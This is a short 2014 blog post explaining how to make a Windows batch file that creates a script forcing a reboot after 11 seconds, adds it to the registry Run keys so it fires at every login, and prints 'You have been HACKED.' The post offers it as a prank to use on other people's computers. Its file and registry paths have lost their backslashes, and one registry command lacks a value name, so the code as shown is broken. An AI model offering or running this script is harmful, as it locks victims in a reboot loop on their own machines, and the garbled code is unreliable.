Monday, 7 July 2014

0

How To Shutdowns Computer Everytime Time Turned On

Step 1 >> Open Notepad


Step 2 >> Copy This Code


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


Step 3 >> Save It As A filename.bat

Warning: Don't use in your computer.

0 comments:

Post a Comment